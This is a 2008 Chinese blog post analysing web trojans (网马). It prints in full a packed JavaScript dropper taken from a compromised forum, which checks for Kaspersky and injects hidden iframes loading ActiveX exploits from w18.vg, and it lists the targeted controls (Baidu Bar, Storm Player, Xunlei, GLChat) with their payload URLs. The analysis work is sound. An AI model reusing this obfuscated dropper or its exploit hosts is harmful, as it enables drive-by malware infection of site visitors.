网页脚本解密初探

来源:爱毒霸社区


实例分析1:
目标代码一个利用real漏洞的网马(h**p://town.521town.com/wm/rl.js)

1,使用httpdebug获取网页源代码

1.jpg 大小: 103.41 K 尺寸: 500 x 405 浏览: 5 次 点击打开新窗口浏览全图

2,发现是一个典型的real漏洞利用的网马,将codes=后面的内容复制到小G的ALPHA编码转换器里面转换以后就能够得出这个网马下载的地址了

2.jpg 大小: 62.82 K 尺寸: 384 x 469 浏览: 5 次 点击打开新窗口浏览全图

实例分析2
目标网站琴龙乐器(http://bbs.guitarq.com/index.asp

1,使用freshow直接获取网页源代码

3.jpg 大小: 116.81 K 尺寸: 500 x 377 浏览: 8 次 点击打开新窗口浏览全图

最终获取的源代码,是不是很熟悉啊小G的教程里面有介绍吧吧

document.getElementById("textareaID").innerText= 解密吧

  1. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((cc=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])pp=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1E E(){1D(i=2;i<1C;i++){l t=4 W();l s=4 W();l u=F.1B(1A+i);t.6="V:@U:"+u+":\\\\T%S\\\\q%R\\\\q%Q%P%1z.0\\\\O\\\\N.M::/L/K.9";s.6="V:@U:"+u+":\\\\T%S\\\\q%R\\\\q%Q%P%1y.0\\\\O\\\\N.M::/L/K.9";5(t.J==I||s.J==I)H 1x}H 1w}1v="1u&&&&&&&&&&&&&&&&&&&&&&&&1t";l p=4 1s();p.1r(p.1q()+1p*G*G*1o);l D=4 F(8.x);l C="v=";5(!E()&&D.B(C)==-1){k{5(4 o("1n"+"1m.1l"+"1k.1"))8.j(\'<3 h=n:f 6="c://m.b/1j.9"></3>\')}a(e){}k{5(4 o("1i.1h"+"1g"+"1f.1"))8.j(\'<3 h=n:f 6="c://m.b/1e.9"></3>\')}a(e){}k{5(1d.1c.1b().B("A"+"1a 7")==-1)8.j(\'<3 h=n:f 6="c://m.b/A.9"></3>\')}a(e){}k{5(4 o("z"+"y"+".z"+"y.1"))8.j(\'<3 h=d\'+\'19\'+\'17:f 6="c://w\'+\'18\'+\'.b/r\'+\'16.g\'+\'5"></3>\')}a(e){}k{5(4 o("15.14.1"))8.j(\'<3 h=n:f 6="c://m.b/13.9"></3>\')}a(e){}8.x="v=12;11="+p.10();k{5(4 o("Z.Y"))8.j(\'<3 h=n:f 6="c://m.b/X.9"></3>\')}a(e){}}',62,103,'|||iframe|new|if|src||document|gif|catch|vg|http|||none||style||write|try|var|w18|display|ActiveXObject|Then|Kaspersky||bbbbbbbbbbbkis7|bbbbbbbbkis6|rootCookie1||cookie|PCtl|IER|ms|indexOf|cookieHeader|fdsafasdfasdfcookie|bIsKIS|String|60|return|41|height|help|images|chm|context|Doc|20Security|20Internet|20Lab|20Files|Program|MSITStore|mk|Image|xl|Vod|DPClient|toGMTString|expires|POPWINDOS|lz|GLChatCtrl|GLCHAT|eal|lay||isp|ie|toLowerCase|userAgent|navigator|bf|layer|ormP|St|MPS|baidu|ol|To|duBar|Bai|1000|24|getTime|setTime|Date|FDFff454545|xxxx|bbbbbbbbbbbbbsdfdsfdfdf|false|true|207|206|65|fromCharCode|26|for|function'.split('|'),0,{}))  

解密后的提取关键的代码,并参考巡警的2007网马总结文章

 

ActiveXObject("BaiduBar.Tool.1"))--百度搜霸ActiveX控件远程代码执行漏洞
http://w18.vg/baidu.gif
ActiveXObject("MPS.StormPlayer.1"))--暴风影音2 mps.dll组件多个缓冲区溢出漏洞
http://w18.vg/bf.gif
navigator.userAgent.("msie7")--不知道什么漏洞,不能下载下来 ^_^
http://w18.vg/ms.gif
ActiveXObject("IERPCtlIERPCtl.1")--同上
http://w18.vg/real.gif
ActiveXObject("GLCHAT.GLChatCtrl.1")--联众游戏聊天室组件漏洞
http://w18.vg/lz.gif
ActiveXObject("DPClient.Vod")--迅雷5漏洞
http://w18.vg/xl.gif

Posted on: 2008, October 23, 10:54 PM | Filed under: 反向分析 |
Tags:web

您可能会对以下文章感兴趣哦

Leave a comment

Your comment

Why not Login? Sign up now! »